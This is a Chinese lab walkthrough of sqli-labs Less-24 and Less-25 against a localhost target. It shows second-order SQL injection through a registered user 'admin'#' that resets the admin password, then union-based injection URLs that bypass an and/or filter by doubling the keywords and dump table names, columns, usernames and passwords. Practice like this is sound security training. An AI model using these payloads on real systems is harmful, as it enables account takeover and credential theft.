1.使用用户名:admin 密码:admin0(每个人密码都不一样请注意!!) 进行登录
3.我们先不改密码,先回到登陆页面进行新用户admin'#的创建
5.再使用admin用户登录,结果发现登录失败,之后我们把密码换成abcd,再登录显示成功
Less-24:
首先我们进入靶场
1.使用用户名:admin 密码:admin0(每个人密码都不一样请注意!!) 进行登录
2.在登录成功,会出现一个重置密码界面
3.我们先不改密码,先回到登陆页面进行新用户admin'#的创建
密码自定,我是111。
4.使用新注册的用户进行登录,修改密码为abcd
此为密码修改成功
5.再使用admin用户登录,结果发现登录失败,之后我们把密码换成abcd,再登录显示成功
登录失败
登录成功
6.查看源码
在我们修改用户admin'#的密码时,实际执行的语句为下列语句,所以我们才能修改用户admin的密码
UPDATE users SET PASSWORD='abcd' where username='admin'
结束
Less-25:
我们转换到25号靶场
1.首先我们要判断注入类型
通过报错,我们可以大概看出是一个单引号字符型注入
2.继续判断的时候发现过滤了and
3.判断字段数并查看显示位置
http://127.0.0.1/sqllab/Less-25/?id=1' order by 3--+
http://127.0.0.1/sqllab/Less-25/?id=1' oorrder by 3--+ #双写绕过
http://127.0.0.1/sqllab/less-25/?id=-1' union select 1,2,3 --+
4.查看当前数据库
http://127.0.0.1/sqllab/less-25/?id=-1' union select 1,2,database()--+
5.爆表
http://127.0.0.1/sqllab/less-25/?id=-1' union select 1,2,group_concat(table_name) from infoandrmation_schema.tables where table_schema='security'--+
6.爆列
http://127.0.0.1/sqllab/less-25/?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users'--+
7.爆数据
http://127.0.0.1/sqllab/less-25/?id=-1' and union select 1,group_concat(username),group_concat(passwoorrd) from users--+